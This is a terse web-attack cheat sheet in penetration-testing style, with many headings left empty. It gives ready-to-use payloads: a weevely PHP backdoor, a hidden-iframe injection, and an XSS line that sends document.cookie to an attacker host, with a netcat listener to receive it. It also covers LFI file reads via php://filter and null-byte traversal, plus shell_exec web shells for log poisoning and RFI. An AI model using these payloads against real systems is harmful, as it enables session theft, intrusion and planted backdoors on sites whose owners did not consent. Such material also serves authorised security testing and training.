Web Shag Web Application Vulnerability Assessment Platform
Web Shells
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
Java Signed Applet Attack
HTTP / HTTPS Webserver Enumeration
OWASP Dirbuster
nikto -h $ip
Essential Iceweasel Add-ons
Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data
Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more
Browser Redirection and IFRAME Injection
<iframe SRC="http://$ip/report" height = "0" width="0"></iframe>
Stealing Cookies and Session Information
new image().src="http://$ip/bogus.php?output="+document.cookie;
nc -nlvp 80
File Inclusion Vulnerabilities
Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.
fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.
For Local File Inclusions look for the include() function in PHP code.
LFI - Encode and Decode a file using base64
curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d
LFI - Download file with base 64 encoding
LFI Linux Files:
LFI Windows Files:
LFI OSX Files:
LFI - Download passwords file
LFI - Download passwords file with filter evasion
Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>
For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files
/etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "on"
Remote File Inclusion
<?php echo shell\_exec("ipconfig");?>